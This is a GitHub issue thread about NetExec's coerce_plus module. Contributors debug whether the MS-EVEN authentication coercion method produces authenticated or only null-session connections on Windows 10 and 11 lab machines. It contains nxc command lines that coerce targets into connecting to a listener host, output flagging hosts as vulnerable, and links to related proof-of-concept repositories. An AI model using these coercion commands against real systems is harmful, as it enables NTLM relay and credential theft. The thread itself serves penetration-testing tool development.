Pennyw0rth
coerce_plus: MS-EVEN not working
The MS-EVEN method used in coerce_plus is not working on the machines I tested (Win 10, Win 11), there are connections being triggered, but they are null sessions. When I looked at the PR, it looks like @NeffIsBack had the same results in the screenshot: https://github.com/Pennyw0rth/NetExec/pull/300#issuecomment-2395107662 Are there any cases where this attack actually uses credentials?
$ nxc smb -u user -p 'user' --local-auth -M coerce_plus -o LISTENER=192.168.56.111 METHOD=MSEven -- 192.168.56.113
SMB 192.168.56.113 445 WIN11VM [*] Windows 11 Build 22621 x64 (name:WIN11VM) (domain:WIN11VM) (signing:False) (SMBv1:False)
SMB 192.168.56.113 445 WIN11VM [+] WIN11VM\user:user (PRIVILEGED!)
COERCE_PLUS 192.168.56.113 445 WIN11VM VULNERABLE, MSEven
$ nxc smb -u user -p 'user' --local-auth -M coerce_plus -o LISTENER=192.168.56.111 METHOD=MSEven -- 192.168.56.112
SMB 192.168.56.112 445 WIN10VM [*] Windows 10 / Server 2019 Build 18362 x64 (name:WIN10VM) (domain:WIN10VM) (signing:False) (SMBv1:False)
SMB 192.168.56.112 445 WIN10VM [+] WIN10VMREAL\user:user
COERCE_PLUS 192.168.56.112 445 WIN10VM VULNERABLE, MSEven
NetExec info
- OS: debian
- Version of nxc: https://github.com/Pennyw0rth/NetExec/commit/e19868ec
- Installed from: github
EDIT: In the original POC ( https://github.com/evilashz/CheeseOunce ) the author says:
The MS-EVEN runing under the NT AUTHORITY\LOCAL SERVICE account, and this account can't provide valid credentials during network authentication so, in the NTLMRelay attacking, it can't work, like this (Sorry,I didn't test it fully, before push it):
Maybe it should be removed?
Haven't figured it out yet, but first time i tested it it didn't work, second time i tested it it did work. Not sure what the problem was, but at least sometimes it works
Haven't figured it out yet, but first time i tested it it didn't work, second time i tested it it did work. Not sure what the problem was, but at least sometimes it works
We had the same thought, but maybe it was just a false positive due to most of the time being used together with the other methods. In the reply you posted in the merge request, you said that it worked, and according to the screenshot no authentication data was sent. Additionally, the service runs network restricted, so I do not see how it could work at all. Or are there Windows Versions where the eventlog service is not running as network restricted?
Looking at the wireshark traffic you might be right, there are no auth info send in the ntlm request. Maybe there is an edge case where the service isn't running in network restricted mode?
What is really weird to me is, that we still get an STATUS_SUCCESS back from the server when authenticating locally (only the DC though). That doesn't make sense to me.
If you do not see the message “Exploit Success, eventlog\ElfrOpenBELW” when using the LISTENER parameter, NetExec coerce_plus.py - Line 923, it means the MSEven vulnerability has been fixed.
if host even/even6 RPC connection is available its indicator for MS-Even.
@lodos2005 Do you happen to have any Windows Version/Configuration where the RPC function resulted in an authenticated connection?
I'm closing this, recently @Cross-thunter showed that MS-EVEN can be used in conjunction with a known malware to coerce Windows Defender and co. into connecting WITH authentication: https://github.com/Thunter-HackTeam/EvilentCoerce
I failed to replicate it on an up-to-date Windows 11, but on Windows 10 this worked flawlessly!